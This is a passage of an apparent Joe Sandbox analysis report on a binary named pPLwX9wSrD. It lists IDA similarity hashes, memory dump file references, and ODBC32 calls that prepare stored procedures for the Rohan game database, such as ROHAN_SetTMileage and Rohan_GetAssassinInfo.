                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [Rohan_SendItemToRT] (?,?,?,?,?,?,?)}
                                                                                      • API String ID: 0-2009958040
                                                                                      • Opcode ID: 6fc7f963e7d52b2c5caa5781574df854ee552a8ddb187d541eac07abdac5d9a2
                                                                                      • Instruction ID: f1df86a1e22034590b0dc4743cc226c31365f8e50db9be6109c47908e609474f
                                                                                      • Opcode Fuzzy Hash: 6fc7f963e7d52b2c5caa5781574df854ee552a8ddb187d541eac07abdac5d9a2
                                                                                      • Instruction Fuzzy Hash: 9F51E1B07842187BFB248B54CC92FAA7335EB85B18F20C388F7556E2C5DAB56D408F59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [Rohan_GetAssassinInfo] (?,?,?,?,?,?,?)},000000FD), ref: 00437B0E
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00437B50
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00437B88
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00437BC0
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00437BF8
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00437C30
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00437C68
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00437CA0
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00437CD8
                                                                                      Strings
                                                                                      • { ? = CALL [Rohan_GetAssassinInfo] (?,?,?,?,?,?,?)}, xrefs: 00437B05
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [Rohan_GetAssassinInfo] (?,?,?,?,?,?,?)}
                                                                                      • API String ID: 0-4080459032
                                                                                      • Opcode ID: 3cfb95f8beb558c944e052b1f6e01069f124c086691405601e4d22daa71a5ba8
                                                                                      • Instruction ID: 7c9b20973e0449c81a77b5957349593a118ce81f06b26d9d70de73f53f8158ba
                                                                                      • Opcode Fuzzy Hash: 3cfb95f8beb558c944e052b1f6e01069f124c086691405601e4d22daa71a5ba8
                                                                                      • Instruction Fuzzy Hash: A95104B0680214BBFB249B68CD52F697374EB84B18F1043DAF7147E2C5D9B16D808B5C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_SetTMileage] (?,?,?,?,?,?,?)},000000FD), ref: 004383C4
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00438406
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043843B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00438473
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004384AB
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004384E3
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043851B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00438553
                                                                                      • #72.ODBC32(?,00000000,00000004,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043858B
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_SetTMileage] (?,?,?,?,?,?,?)}, xrefs: 004383BB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_SetTMileage] (?,?,?,?,?,?,?)}
                                                                                      • API String ID: 0-2653841448
                                                                                      • Opcode ID: 055783d7915fdb5e98f19eeb27f9b4653c28b7f3784f84b488584394b59b2e6b
                                                                                      • Instruction ID: 29ced0ce0d78aeac3304e1d165eb858787dfc4bb82f343c3ab385cbded185254
                                                                                      • Opcode Fuzzy Hash: 055783d7915fdb5e98f19eeb27f9b4653c28b7f3784f84b488584394b59b2e6b
                                                                                      • Instruction Fuzzy Hash: 4251097064021C7BEB249B94CD52F997375DF98B18F208286FB147E2C5D5B57D808B6C
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000), ref: 0044C188
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?,00000000,00000000), ref: 0044C1B8
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000033,00000000,?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?), ref: 0044C1E8
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?,00000033,00000000,?,00000000,00000001,?), ref: 0044C218
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?), ref: 0044C248
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044C278
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044C2A8
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044C2D8
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044C308
                                                                                      • #4.ODBC32(?,00000000,000000E7,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044C338
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000E7,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044C36A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7e08d1ac398bced4e93afb10bf69d5a2fa20fabd08f9d1bc052dfcdc5b7f9f19
                                                                                      • Instruction ID: 5586432336738c645ee834c801192fce6e3d82cce47f12a62e11c27760b54172
                                                                                      • Opcode Fuzzy Hash: 7e08d1ac398bced4e93afb10bf69d5a2fa20fabd08f9d1bc052dfcdc5b7f9f19
                                                                                      • Instruction Fuzzy Hash: 5651DEB1A00218ABDBA4DB19CC55FAA7379EB44718F208388F61C6B3D5DB71AD80CF54
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000), ref: 0044C3BA
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000), ref: 0044C3EA
                                                                                      • #4.ODBC32(?,00000000,000000FE,?,0000002A,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044C41A
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FE,?,0000002A,00000000,?,00000000,000000F0,?), ref: 0044C44A
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FE,?), ref: 0044C47A
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?), ref: 0044C4AA
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?), ref: 0044C4DA
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?), ref: 0044C50A
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?), ref: 0044C53A
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F1,?,00000000,00000000,?,00000000,000000FA,?), ref: 0044C56A
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F1,?), ref: 0044C59A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 90e4376e416a51c2d706ec3b9ffea40c9519985eec8544c85adc6d47cb6ffc3f
                                                                                      • Instruction ID: 24cac36a4fe30684903c34efb16c77effe1ff13d282d2500ab38e5a55d0d300d
                                                                                      • Opcode Fuzzy Hash: 90e4376e416a51c2d706ec3b9ffea40c9519985eec8544c85adc6d47cb6ffc3f
                                                                                      • Instruction Fuzzy Hash: C651FCB1A01119ABEB24EB09CD99FAE7375FF44714F1482C8F6196B3C1D671AE808F54
                                                                                      APIs
                                                                                      • #4.ODBC32(00000000,00000000,000000F0,?,00000000,00000000), ref: 00443950
                                                                                      • #4.ODBC32(00000000,00000000,00000001,?,00000012,00000000,00000000,00000000,000000F0,?,00000000,00000000), ref: 00443974
                                                                                      • #4.ODBC32(00000000,00000000,000000FE,?,00000064,00000000,00000000,00000000,00000001,?,00000012,00000000,00000000,00000000,000000F0,?), ref: 00443998
                                                                                      • #4.ODBC32(00000000,00000000,000000FE,?,00000064,00000000,00000000,00000000,000000FE,?,00000064,00000000,00000000,00000000,00000001,?), ref: 004439BF
                                                                                      • #4.ODBC32(00000000,00000000,000000E7,?,00000000,00000000,00000000,00000000,000000FE,?,00000064,00000000,00000000,00000000,000000FE,?), ref: 004439E6
                                                                                      • #4.ODBC32(00000000,00000000,000000F0,?,00000000,00000000,00000000,00000000,000000E7,?,00000000,00000000,00000000,00000000,000000FE,?), ref: 00443A0C
                                                                                      • #4.ODBC32(00000000,00000000,000000FA,?,00000000,00000000,00000000,00000000,000000F0,?,00000000,00000000,00000000,00000000,000000E7,?), ref: 00443A33
                                                                                      • #4.ODBC32(00000000,00000000,000000FA,?,00000000,00000000,00000000,00000000,000000FA,?,00000000,00000000,00000000,00000000,000000F0,?), ref: 00443A5A
                                                                                      • #4.ODBC32(00000000,00000000,000000F0,?,00000000,00000000,00000000,00000000,000000FA,?,00000000,00000000,00000000,00000000,000000FA,?), ref: 00443A80
                                                                                      • #4.ODBC32(00000000,00000000,000000FE,?,00000032,00000000,00000000,00000000,000000F0,?,00000000,00000000,00000000,00000000,000000FA,?), ref: 00443AA7
                                                                                      • #4.ODBC32(00000000,00000000,000000FA,?,00000000,00000000,00000000,00000000,000000FE,?,00000032,00000000,00000000,00000000,000000F0,?), ref: 00443ACE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f81d0137002c9018c223e33d0fb14347433f4e43ae7a1225f5e63898b08646b9
                                                                                      • Instruction ID: 1f8ccc96591f4165475f7efbba54667510c61842ec13bd430c10dfe674f5105e
                                                                                      • Opcode Fuzzy Hash: f81d0137002c9018c223e33d0fb14347433f4e43ae7a1225f5e63898b08646b9
                                                                                      • Instruction Fuzzy Hash: 65510AB5E40508BBEB14DF89CC51FAEB379EF84718F10C249F6216B3C5E675AA108B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_SetTCharacterUI] (?,?,?,?,?)},000000FD), ref: 00431516
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00431555
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043158A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004315C2
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004315FA
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00431632
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FE,000000FD,000009C4,00000000,?,00000000,?,?,00000000,00000001,000000E7,000000FB,00000000), ref: 00431684
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FE,000000FD,000007D0,00000000,?,00000000,?,?,00000000,00000001,000000E7,000000FB,00000000), ref: 004316CC
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_SetTCharacterUI] (?,?,?,?,?)}, xrefs: 0043150D
                                                                                      Memory Dump Source
